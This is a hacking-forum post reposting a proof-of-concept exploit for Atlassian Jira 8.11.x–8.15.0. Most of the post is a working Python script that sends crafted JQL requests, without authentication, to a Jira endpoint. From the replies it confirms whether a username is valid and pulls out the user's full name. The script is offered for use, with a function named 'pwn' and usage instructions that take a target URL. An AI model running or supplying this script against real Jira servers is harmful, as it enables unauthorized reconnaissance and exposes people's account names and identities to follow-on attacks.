Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)

 Share


HACK1949

Recommended Posts

# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)
# Date: 31/05/2021
# Exploit Author: Mohammed Aloraimi
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira
# Vulnerable versions: version 8.11.x to 8.15.0
# Tested on: Kali Linux
# Proof Of Concept:

'''
A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x. Unauthenticated users can ENUMRATE valid users via /secure/QueryComponent!Jql.jspa endpoint.

Tested versions:

Atlassian JIRA 8.11.1
Atlassian JIRA 8.13
Atlassian JIRA 8.15
'''

#!/usr/bin/env python

__author__  = "Mohammed Aloraimi (@ixSly)"



import requests
import sys
import re
import urllib3
urllib3.disable_warnings()


def help():
    print('python script.py <target> <username>')
    print('e.g. python script.py https://jiratarget.com admin')
    sys.exit()

if len(sys.argv) < 3:
  help()



def pwn(url,username):

        try:
                headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"}
                data="jql=creator+in+({})&decorator=none".format(username)
                req = requests.post(url+"/secure/QueryComponent!Jql.jspa",headers=headers,verify=False,data=data)
                if "issue.field.project" in req.text and req.status_code == 200:
                        print("[+] {} is a Valid User".format(username))
                        userFullName=re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),str(req.json()["values"]["creator"]).strip())
                        if userFullName:
                                print("[+] User FullName: " + userFullName.group(1))
                elif '["jqlTooComplex"]' in req.text and req.status_code == 401:
                        print("[-] {} is not a Valid User".format(username))
                else:
                        print("[-] Error..")
        except Exception as e:
                print(str(e))
                pass

server = sys.argv[1]
username = sys.argv[2]


pwn(server,username)
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...